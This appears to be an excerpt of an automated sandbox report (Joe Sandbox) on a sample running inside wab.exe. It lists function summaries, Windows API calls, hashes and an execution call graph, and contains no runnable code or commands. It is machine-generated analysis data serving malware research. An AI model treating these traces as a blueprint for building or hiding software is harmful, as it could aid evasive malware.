                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22794C1D
                    • _free.LIBCMT ref: 22794CE8
                    • _free.LIBCMT ref: 22794CF2
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Program Files (x86)\windows mail\wab.exe
                    • API String ID: 2506810119-3377118234
                    • Opcode ID: 91574e1056f6405eb543550b7914a4cb229b8a012363032b3e7c97b64af25a4e
                    • Instruction ID: 39b5e38caf8e301dfa3b539df6b94954fdfa90d5df261acad05ff6ce8dad0540
                    • Opcode Fuzzy Hash: 91574e1056f6405eb543550b7914a4cb229b8a012363032b3e7c97b64af25a4e
                    • Instruction Fuzzy Hash: 4431B271A4A358EFDB12CF99E994D9EBBFCEB96314F1041A6E904A7200D7718A41CB60
                    Function 227986E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22796FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 22798731
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 227987BA
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 227987CC
                    • __freea.LIBCMT ref: 227987D5
                      • Part of subcall function 227956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22795702
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: 9d9592ad62dad962a9b07e1f556221e91a508edf1baf6e202becb332f0aa407b
                    • Instruction ID: 924bf721db62a308174bbe98bfcc1fea7a4f097f0a0c56f5225a508e973f1eb5
                    • Opcode Fuzzy Hash: 9d9592ad62dad962a9b07e1f556221e91a508edf1baf6e202becb332f0aa407b
                    • Instruction Fuzzy Hash: C131CF32A0431AABDF15CFA4EC85EAF7BA5EB54714F410168FD04DB150E73AD951CBA0
                    Function 22795CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22791D66,00000000,00000000,?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue), ref: 22795D13
                    • GetLastError.KERNEL32(?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue,2279E190,FlsSetValue,00000000,00000364,?,22795BC8), ref: 22795D1F
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22795C88,22791D66,00000000,00000000,00000000,?,22795E85,00000006,FlsSetValue,2279E190,FlsSetValue,00000000), ref: 22795D2D
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: fae0c86af416ba2a612c015e1d676f95d41190a78a4f3ef942d88086c75b6cf6
                    • Instruction ID: 337c20e2d53665ee5f46c5fc59821682ac503d4cdc9295ed9c4281dadcf1d8af
                    • Opcode Fuzzy Hash: fae0c86af416ba2a612c015e1d676f95d41190a78a4f3ef942d88086c75b6cf6
                    • Instruction Fuzzy Hash: 5601843665D332ABC7115E6EAC8DE467758AF057A5F500A20FE09E7144D734E902CAE0
                    Function 227916AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: : $Se.
                    • API String ID: 4218353326-4089948878
                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction ID: 3178a52bd823c2fcd077c21f6365187cbf33fe98141163fe9704982c3936c54a
                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                    • Instruction Fuzzy Hash: B311E3B1A0434AAECB11CFA8E840BDEFBFCAF19304F10405AE545E7222E6705B02C7A5
                    Function 22791EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 22792903
                      • Part of subcall function 227935D2: RaiseException.KERNEL32(?,?,?,22792925,00000000,00000000,00000000,?,?,?,?,?,22792925,?,227A21B8), ref: 22793632
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 22792920
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Unknown exception
                    • API String ID: 3476068407-410509341
                    • Opcode ID: 337854b493160ade5a834921cf6fb6db7e8ecf7e56a7af3bfdfc7c738af63f7b
                    • Instruction ID: 8d5b4ec656c03dc3e7bfd6263d5ba7f48b9e5eb12f54f7a40381ca414cd70476
                    • Opcode Fuzzy Hash: 337854b493160ade5a834921cf6fb6db7e8ecf7e56a7af3bfdfc7c738af63f7b
                    • Instruction Fuzzy Hash: 3FF0AF34A0C30D778B05B6A4FC59D9A776C9B34760B904270EA24A7090FBB1EA16C681
                    Function 227969F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • GetOEMCP.KERNEL32(00000000,?,?,22796C7C,?), ref: 22796A1E
                    • GetACP.KERNEL32(00000000,?,?,22796C7C,?), ref: 22796A35
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.3005887197.0000000022791000.00000040.00001000.00020000.00000000.sdmp, Offset: 22790000, based on PE: true
                    • Associated: 00000009.00000002.3005867123.0000000022790000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000009.00000002.3005887197.00000000227A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_22790000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: |ly"
                    • API String ID: 0-1794994471
                    • Opcode ID: 1c36178b651dbee4b4955c8daba2a554621431615f1b9937180cbfca2661f453
                    • Instruction ID: f05086698086d8961b68e4c1c7a43370024845c1648678f1a8dba5b2143ff6b2
                    • Opcode Fuzzy Hash: 1c36178b651dbee4b4955c8daba2a554621431615f1b9937180cbfca2661f453
                    • Instruction Fuzzy Hash: 4CF049308583898FD700DF68D548B6CB7B1FB0133AF548B48F8389A1D9DB759986CB45

                    Execution Graph

                    Execution Coverage:6.1%
                    Dynamic/Decrypted Code Coverage:9.2%
                    Signature Coverage:2.4%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:60
                    execution_graph 40511 441819 40514 430737 40511->40514 40513 441825 40515 430756 40514->40515 40516 43076d 40514->40516 40517 430774 40515->40517 40518 43075f 40515->40518 40516->40513 40529 43034a memcpy 40517->40529 40528 4169a7 11 API calls 40518->40528 40521 4307ce 40522 430819 memset 40521->40522 40530 415b2c 11 API calls 40521->40530 40522->40516 40523 43077e 40523->40516 40523->40521 40526 4307fa 40523->40526 40525 4307e9 40525->40516 40525->40522 40531 4169a7 11 API calls 40526->40531 40528->40516 40529->40523 40530->40525 40531->40516 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 44681e GetStartupInfoW 38303->38304 38305 446810 38303->38305 38307 446866 GetModuleHandleA 38304->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38305 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38340 412863 CoInitialize 38336->38340 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38340->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38465 38386 40ac5c 38389 40ad4b 38386->38389 38390 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38386->38390 38392 40ace7 ??3@YAXPAX 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 7 API calls 38386->38469 38470 4099f4 38386->38470 38389->38397 38478 40a9ce 38389->38478 38390->38386 38392->38386 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38484 40dce0 38402->38484 38404 40dd3a GetModuleHandleW 38489 40dba7 38404->38489 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38561 40dae1 38409->38561 38575 402f3a 38412->38575 38414 412766 38414->38333 38414->38340 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38609 4125f8 7 API calls 38416->38609 38418->38414 38578 411ac5 38418->38578 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 ??3@YAXPAX 38434->38436 38437 40b1ab ??3@YAXPAX ??3@YAXPAX 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a ??3@YAXPAX 38466->38468 38467->38398 38468->38467 38469->38386 38471 409a41 38470->38471 38472 4099fb malloc 38470->38472 38471->38386 38474 409a37 38472->38474 38475 409a1c 38472->38475 38474->38386 38476 409a30 ??3@YAXPAX 38475->38476 38477 409a20 memcpy 38475->38477 38476->38474 38477->38476 38479 40a9e7 38478->38479 38480 40a9dc ??3@YAXPAX 38478->38480 38482 4099f4 3 API calls 38479->38482 38481 40a9f2 38480->38481 38483 40a8d0 7 API calls 38481->38483 38482->38481 38483->38397 38508 409bca GetModuleFileNameW 38484->38508 38486 40dce6 wcsrchr 38487 40dcf5 38486->38487 38488 40dcf9 wcscat 38486->38488 38487->38488 38488->38404 38509 44db70 38489->38509 38493 40dbfd 38512 4447d9 38493->38512 38496 40dc34 wcscpy wcscpy 38538 40d6f5 38496->38538 38497 40dc1f wcscpy 38497->38496 38500 40d6f5 3 API calls 38501 40dc73 38500->38501 38502 40d6f5 3 API calls 38501->38502 38503 40dc89 38502->38503 38504 40d6f5 3 API calls 38503->38504 38505 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38504->38505 38544 40da80 38505->38544 38508->38486 38510 40dbb4 memset memset 38509->38510 38511 409bca GetModuleFileNameW 38510->38511 38511->38493 38514 4447f4 38512->38514 38513 40dc1b 38513->38496 38513->38497 38514->38513 38515 444807 ??2@YAPAXI 38514->38515 38516 44481f 38515->38516 38517 444873 _snwprintf 38516->38517 38518 4448ab wcscpy 38516->38518 38551 44474a 8 API calls 38517->38551 38519 4448bb 38518->38519 38552 44474a 8 API calls 38519->38552 38522 4448a7 38522->38518 38522->38519 38523 4448cd 38553 44474a 8 API calls 38523->38553 38525 4448e2 38554 44474a 8 API calls 38525->38554 38527 4448f7 38555 44474a 8 API calls 38527->38555 38529 44490c 38556 44474a 8 API calls 38529->38556 38531 444921 38557 44474a 8 API calls 38531->38557 38533 444936 38558 44474a 8 API calls 38533->38558 38535 44494b 38559 44474a 8 API calls 38535->38559 38537 444960 ??3@YAXPAX 38537->38513 38539 44db70 38538->38539 38540 40d702 memset GetPrivateProfileStringW 38539->38540 38541 40d752 38540->38541 38542 40d75c WritePrivateProfileStringW 38540->38542 38541->38542 38543 40d758 38541->38543 38542->38543 38543->38500 38545 44db70 38544->38545 38546 40da8d memset 38545->38546 38547 40daac LoadStringW 38546->38547 38548 40dac6 38547->38548 38548->38547 38550 40dade 38548->38550 38560 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38548->38560 38550->38333 38551->38522 38552->38523 38553->38525 38554->38527 38555->38529 38556->38531 38557->38533 38558->38535 38559->38537 38560->38548 38571 409b98 GetFileAttributesW 38561->38571 38563 40daea 38564 40db63 38563->38564 38565 40daef wcscpy wcscpy GetPrivateProfileIntW 38563->38565 38564->38335 38572 40d65d GetPrivateProfileStringW 38565->38572 38567 40db3e 38573 40d65d GetPrivateProfileStringW 38567->38573 38569 40db4f 38574 40d65d GetPrivateProfileStringW 38569->38574 38571->38563 38572->38567 38573->38569 38574->38564 38610 40eaff 38575->38610 38579 411ae2 memset 38578->38579 38580 411b8f 38578->38580 38650 409bca GetModuleFileNameW 38579->38650 38592 411a8b 38580->38592 38582 411b0a wcsrchr 38583 411b22 wcscat 38582->38583 38584 411b1f 38582->38584 38651 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38583->38651 38584->38583 38586 411b67 38652 402afb 38586->38652 38590 411b7f 38708 40ea13 SendMessageW memset SendMessageW 38590->38708 38593 402afb 27 API calls 38592->38593 38594 411ac0 38593->38594 38595 4110dc 38594->38595 38596 41113e 38595->38596 38601 4110f0 38595->38601 38733 40969c LoadCursorW SetCursor 38596->38733 38598 411143 38734 444a54 38598->38734 38737 4032b4 38598->38737 38599 4110f7 _wcsicmp 38599->38601 38600 411157 38602 40ada2 _wcsicmp 38600->38602 38601->38596 38601->38599 38755 410c46 10 API calls 38601->38755 38605 411167 38602->38605 38603 4111af 38605->38603 38606 4111a6 qsort 38605->38606 38606->38603 38609->38416 38611 40eb10 38610->38611 38623 40e8e0 38611->38623 38614 40eb6c memcpy memcpy 38618 40ebb7 38614->38618 38615 40ebf2 ??2@YAPAXI ??2@YAPAXI 38617 40ec2e ??2@YAPAXI 38615->38617 38620 40ec65 38615->38620 38616 40d134 16 API calls 38616->38618 38617->38620 38618->38614 38618->38615 38618->38616 38620->38620 38633 40ea7f 38620->38633 38622 402f49 38622->38416 38624 40e8f2 38623->38624 38625 40e8eb ??3@YAXPAX 38623->38625 38626 40e900 38624->38626 38627 40e8f9 ??3@YAXPAX 38624->38627 38625->38624 38628 40e911 38626->38628 38629 40e90a ??3@YAXPAX 38626->38629 38627->38626 38630 40e931 ??2@YAPAXI ??2@YAPAXI 38628->38630 38631 40e921 ??3@YAXPAX 38628->38631 38632 40e92a ??3@YAXPAX 38628->38632 38629->38628 38630->38614 38631->38632 38632->38630 38634 40aa04 ??3@YAXPAX 38633->38634 38635 40ea88 38634->38635 38636 40aa04 ??3@YAXPAX 38635->38636 38637 40ea90 38636->38637 38638 40aa04 ??3@YAXPAX 38637->38638 38639 40ea98 38638->38639 38640 40aa04 ??3@YAXPAX 38639->38640 38641 40eaa0 38640->38641 38642 40a9ce 4 API calls 38641->38642 38643 40eab3 38642->38643 38644 40a9ce 4 API calls 38643->38644 38645 40eabd 38644->38645 38646 40a9ce 4 API calls 38645->38646 38647 40eac7 38646->38647 38648 40a9ce 4 API calls 38647->38648 38649 40ead1 38648->38649 38649->38622 38650->38582 38651->38586 38709 40b2cc 38652->38709 38654 402b0a 38655 40b2cc 27 API calls 38654->38655 38656 402b23 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 402b3a 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 402b54 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 402b6b 38661->38662 38663 40b2cc 27 API calls 38662->38663 38664 402b82 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 402b99 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402bb0 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402bc7 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402bde 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402bf5 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402c0c 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402c23 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402c3a 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402c51 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402c68 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c7f 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c99 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402cb3 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402cd5 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402cf0 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402d0b 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402d26 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402d3e 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402d59 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402d78 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d93 38705->38706 38707 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38706->38707 38707->38590 38708->38580 38712 40b58d 38709->38712 38711 40b2d1 38711->38654 38713 40b5a4 GetModuleHandleW FindResourceW 38712->38713 38714 40b62e 38712->38714 38715 40b5c2 LoadResource 38713->38715 38717 40b5e7 38713->38717 38714->38711 38716 40b5d0 SizeofResource LockResource 38715->38716 38715->38717 38716->38717 38717->38714 38725 40afcf 38717->38725 38719 40b608 memcpy 38728 40b4d3 memcpy 38719->38728 38721 40b61e 38729 40b3c1 18 API calls 38721->38729 38723 40b626 38730 40b04b 38723->38730 38726 40b04b ??3@YAXPAX 38725->38726 38727 40afd7 ??2@YAPAXI 38726->38727 38727->38719 38728->38721 38729->38723 38731 40b051 ??3@YAXPAX 38730->38731 38732 40b05f 38730->38732 38731->38732 38732->38714 38733->38598 38735 444a64 FreeLibrary 38734->38735 38736 444a83 38734->38736 38735->38736 38736->38600 38738 4032c4 38737->38738 38739 40b633 ??3@YAXPAX 38738->38739 38740 403316 38739->38740 38756 44553b 38740->38756 38744 403480 38952 40368c 15 API calls 38744->38952 38746 403489 38747 40b633 ??3@YAXPAX 38746->38747 38748 403495 38747->38748 38748->38600 38749 4033a9 memset memcpy 38750 4033ec wcscmp 38749->38750 38751 40333c 38749->38751 38750->38751 38751->38744 38751->38749 38751->38750 38950 4028e7 11 API calls 38751->38950 38951 40f508 6 API calls 38751->38951 38753 403421 _wcsicmp 38753->38751 38755->38601 38757 445548 38756->38757 38758 445599 38757->38758 38953 40c768 38757->38953 38759 4455a8 memset 38758->38759 38900 4457f2 38758->38900 39036 403988 38759->39036 38766 445854 38767 4458aa 38766->38767 39161 403c9c memset memset memset memset memset 38766->39161 38769 44594a 38767->38769 38770 4458bb memset memset 38767->38770 38768 445672 39047 403fbe memset memset memset memset memset 38768->39047 38772 4459ed 38769->38772 38773 44595e memset memset 38769->38773 38775 414c2e 16 API calls 38770->38775 38777 445a00 memset memset 38772->38777 38778 445b22 38772->38778 38779 414c2e 16 API calls 38773->38779 38774 4455e5 38774->38768 38791 44560f 38774->38791 38780 4458f9 38775->38780 39184 414c2e 38777->39184 38783 445bca 38778->38783 38784 445b38 memset memset memset 38778->38784 38789 44599c 38779->38789 38790 40b2cc 27 API calls 38780->38790 38800 445c8b memset memset 38783->38800 38850 445cf0 38783->38850 38795 445bd4 38784->38795 38796 445b98 38784->38796 38785 445849 39248 40b1ab ??3@YAXPAX ??3@YAXPAX 38785->39248 38799 40b2cc 27 API calls 38789->38799 38801 445909 38790->38801 38792 4087b3 338 API calls 38791->38792 38811 445621 38792->38811 38794 44589f 39249 40b1ab ??3@YAXPAX ??3@YAXPAX 38794->39249 38808 414c2e 16 API calls 38795->38808 38796->38795 38804 445ba2 38796->38804 38813 4459ac 38799->38813 38802 414c2e 16 API calls 38800->38802 38810 409d1f 6 API calls 38801->38810 38814 445cc9 38802->38814 39321 4099c6 wcslen 38804->39321 38805 4456b2 39236 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->39236 38807 40b2cc 27 API calls 38817 445a4f 38807->38817 38819 445be2 38808->38819 38809 403335 38949 4452e5 45 API calls 38809->38949 38822 445919 38810->38822 39234 4454bf 20 API calls 38811->39234 38812 445823 38812->38785 38830 4087b3 338 API calls 38812->38830 38823 409d1f 6 API calls 38813->38823 38824 409d1f 6 API calls 38814->38824 38815 445879 38815->38794 38834 4087b3 338 API calls 38815->38834 39199 409d1f wcslen wcslen 38817->39199 38828 40b2cc 27 API calls 38819->38828 38820 445d3d 38848 40b2cc 27 API calls 38820->38848 38821 445d88 memset memset memset 38831 414c2e 16 API calls 38821->38831 39250 409b98 GetFileAttributesW 38822->39250 38832 4459bc 38823->38832 38833 445ce1 38824->38833 38825 445bb3 39324 445403 memset 38825->39324 38826 445680 38826->38805 39070 4087b3 memset 38826->39070 38837 445bf3 38828->38837 38830->38812 38840 445dde 38831->38840 39317 409b98 GetFileAttributesW 38832->39317 39341 409b98 GetFileAttributesW 38833->39341 38834->38815 38847 409d1f 6 API calls 38837->38847 38838 445928 38838->38769 39251 40b6ef 38838->39251 38849 40b2cc 27 API calls 38840->38849 38842 4459cb 38842->38772 38859 40b6ef 252 API calls 38842->38859 38846 40b2cc 27 API calls 38852 445a94 38846->38852 38854 445c07 38847->38854 38855 445d54 _wcsicmp 38848->38855 38858 445def 38849->38858 38850->38809 38850->38820 38850->38821 38851 445389 258 API calls 38851->38783 39204 40ae18 38852->39204 38853 44566d 38853->38900 39121 413d4c 38853->39121 38862 445389 258 API calls 38854->38862 38863 445d71 38855->38863 38926 445d67 38855->38926 38857 445665 39235 40b1ab ??3@YAXPAX ??3@YAXPAX 38857->39235 38864 409d1f 6 API calls 38858->38864 38859->38772 38867 445c17 38862->38867 39342 445093 23 API calls 38863->39342 38870 445e03 38864->38870 38866 4456d8 38872 40b2cc 27 API calls 38866->38872 38873 40b2cc 27 API calls 38867->38873 38869 44563c 38869->38857 38875 4087b3 338 API calls 38869->38875 39343 409b98 GetFileAttributesW 38870->39343 38871 40b6ef 252 API calls 38871->38809 38877 4456e2 38872->38877 38878 445c23 38873->38878 38874 445d83 38874->38809 38875->38869 39237 413fa6 _wcsicmp _wcsicmp 38877->39237 38882 409d1f 6 API calls 38878->38882 38880 445e12 38883 445e6b 38880->38883 38887 40b2cc 27 API calls 38880->38887 38885 445c37 38882->38885 39345 445093 23 API calls 38883->39345 38884 4456eb 38890 4456fd memset memset memset memset 38884->38890 38891 4457ea 38884->38891 38892 445389 258 API calls 38885->38892 38886 445b17 39318 40aebe 38886->39318 38894 445e33 38887->38894 39238 409c70 wcscpy wcsrchr 38890->39238 39241 413d29 38891->39241 38898 445c47 38892->38898 38899 409d1f 6 API calls 38894->38899 38896 445e7e 38901 445f67 38896->38901 38904 40b2cc 27 API calls 38898->38904 38905 445e47 38899->38905 38900->38766 39138 403e2d memset memset memset memset memset 38900->39138 38906 40b2cc 27 API calls 38901->38906 38902 445ab2 memset 38907 40b2cc 27 API calls 38902->38907 38909 445c53 38904->38909 39344 409b98 GetFileAttributesW 38905->39344 38911 445f73 38906->38911 38912 445aa1 38907->38912 38908 409c70 2 API calls 38913 44577e 38908->38913 38914 409d1f 6 API calls 38909->38914 38916 409d1f 6 API calls 38911->38916 38912->38886 38912->38902 38917 409d1f 6 API calls 38912->38917 39211 40add4 38912->39211 39216 445389 38912->39216 39225 40ae51 38912->39225 38918 409c70 2 API calls 38913->38918 38919 445c67 38914->38919 38915 445e56 38915->38883 38923 445e83 memset 38915->38923 38920 445f87 38916->38920 38917->38912 38921 44578d 38918->38921 38922 445389 258 API calls 38919->38922 39348 409b98 GetFileAttributesW 38920->39348 38921->38891 38928 40b2cc 27 API calls 38921->38928 38922->38783 38927 40b2cc 27 API calls 38923->38927 38926->38809 38926->38871 38929 445eab 38927->38929 38930 4457a8 38928->38930 38931 409d1f 6 API calls 38929->38931 38932 409d1f 6 API calls 38930->38932 38934 445ebf 38931->38934 38933 4457b8 38932->38933 39240 409b98 GetFileAttributesW 38933->39240 38936 40ae18 9 API calls 38934->38936 38940 445ef5 38936->38940 38937 4457c7 38937->38891 38939 4087b3 338 API calls 38937->38939 38938 40ae51 9 API calls 38938->38940 38939->38891 38940->38938 38941 445f5c 38940->38941 38943 40add4 2 API calls 38940->38943 38944 40b2cc 27 API calls 38940->38944 38945 409d1f 6 API calls 38940->38945 38947 445f3a 38940->38947 39346 409b98 GetFileAttributesW 38940->39346 38942 40aebe FindClose 38941->38942 38942->38901 38943->38940 38944->38940 38945->38940 39347 445093 23 API calls 38947->39347 38949->38751 38950->38753 38951->38751 38952->38746 38954 40c775 38953->38954 39349 40b1ab ??3@YAXPAX ??3@YAXPAX 38954->39349 38956 40c788 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39350 38958 40c790 39351 40b1ab ??3@YAXPAX ??3@YAXPAX 38958->39351 38960 40c798 38961 40aa04 ??3@YAXPAX 